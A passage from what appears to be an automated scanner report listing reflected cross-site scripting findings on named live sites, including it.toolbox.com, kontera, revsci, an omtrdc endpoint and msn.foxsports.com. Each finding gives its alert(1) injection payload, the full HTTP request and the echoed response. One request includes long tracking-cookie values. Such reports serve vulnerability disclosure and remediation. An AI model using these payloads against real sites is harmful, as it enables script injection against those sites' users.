    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%263719a'-alert(1)-'3be2065b10e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.137. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/penguinista-databasiensis

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f871'-alert(1)-'61cc9848b43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/penguinista-databasiensis?2f871'-alert(1)-'61cc9848b43=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...

{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dpenguinista-databasiensis%262f871'-alert(1)-'61cc9848b43%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.138. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f740'-alert(1)-'6ebdefa1aa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday?1f740'-alert(1)-'6ebdefa1aa5=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%261f740'-alert(1)-'6ebdefa1aa5%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.139. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d10fd<script>alert(1)</script>5443b795f8c was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F08747d10fd<script>alert(1)</script>5443b795f8c HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 02 Feb 2011 15:27:14 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 03 Feb 2011 15:27:14 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 15:27:14 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F08747D10FD<SCRIPT>ALERT(1)</SCRIPT>5443B795F8C" was not recognized.
*/

1.140. http://kona5.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98161"%3balert(1)//e83152febaa was submitted in the l parameter. This input was echoed as 98161";alert(1)//e83152febaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161"%3balert(1)//e83152febaa&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=0&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 11135

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=131855&layout=adlinks&sId=892,1017&cb=1296570685&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(5);

...[SNIP]...
8517915;
konaRequestId="27018855101607070";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161";alert(1)//e83152febaa&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

1.141. http://kona5.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7bc"-alert(1)-"ecbff65bd55 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=09d7bc"-alert(1)-"ecbff65bd55&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 10579

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=131855&layout=adlinks&sId=892,1017&cb=1296570686&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(5);

...[SNIP]...
nsion" : { "urls" : [] } }, { "bridge_position" : { "value" : "" } }, { "advanced_setting_ad_type_id" : { "value" : 10 } } ]});
teDataHere(false,'131855','1');
konaTweakMode=134300187;
konaRequestId="09d7bc"-alert(1)-"ecbff65bd55";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dc_aff_id=");
onKonaReturn(1);
}, "react
...[SNIP]...

1.142. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://millenniumhotels.tt.omtrdc.net
Path:   /m2/millenniumhotels/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 73495<script>alert(1)</script>00d7074f8fe was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=2&hotelId=11536&mbox=Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe&mboxId=0&mboxTime=1296552397746&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1
Host: millenniumhotels.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 217
Date: Wed, 02 Feb 2011 15:36:11 GMT
Server: Test & Target

mboxFactories.get('default').get('Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1296573995979-796819.17");

1.143. http://msn.foxsports.com/cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b51f6'-alert(1)-'4ced383f894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111?b51f6'-alert(1)-'4ced383f894=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253307
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Wed, 02 Feb 2011 15:37:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/collegebasketball/story/Texas-trounces-Texas-A&amp;M-for-Big-12-win-013111?b51f6'-alert(1)-'4ced383f894=1';

       startComments('StoryComments', '26549032'); // load up team comments
   </script>
...[SNIP]...

1.144. http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/lists/scout-top-25-team-recruit-rankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d4a'-alert(1)-'ab313af8cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collegefootball/lists/scout-top-25-team-recruit-rankings?14d4a'-alert(1)-'ab313af8cd3=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 242788
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=53
Date: Wed, 02 Feb 2011 15:37:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings?14d4a'-alert(1)-'ab313af8cd3=1';

       startComments('StoryComments', '24'); // load up team comments
   </script>
...[SNIP]...

1.145. http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93cfb'-alert(1)-'bea40c5b74b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111?93cfb'-alert(1)-'bea40c5b74b=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 256587
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=43
Date: Wed, 02 Feb 2011 15:37:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111?93cfb'-alert(1)-'bea40c5b74b=1';

       startComments('StoryComments', '26511070'); // load up team comments
   </script>
...[SNIP]...

1.146. http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dcc0'-alert(1)-'c4dbd5116c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111?2dcc0'-alert(1)-'c4dbd5116c5=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 245955
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=36
Date: Wed, 02 Feb 2011 15:37:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111?2dcc0'-alert(1)-'c4dbd5116c5=1';

       startComments('StoryComments', '26546002'); // load up team comments
   </script>
...[SNIP]...

1.147. http://msn.foxsports.com/nba/page/heat-or-threepeat [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/page/heat-or-threepeat

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d60'-alert(1)-'1f301dec17c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nba/page/heat-or-threepeat?f4d60'-alert(1)-'1f301dec17c=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247480
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=22
Date: Wed, 02 Feb 2011 15:37:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/page/heat-or-threepeat?f4d60'-alert(1)-'1f301dec17c=1';

       startComments('StoryComments', 'EVENT_295449'); // load up team comments
   </script>
...[SNIP]...

1.148. http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/Mavericks-102-Wizards-92-01372633

Issue detail

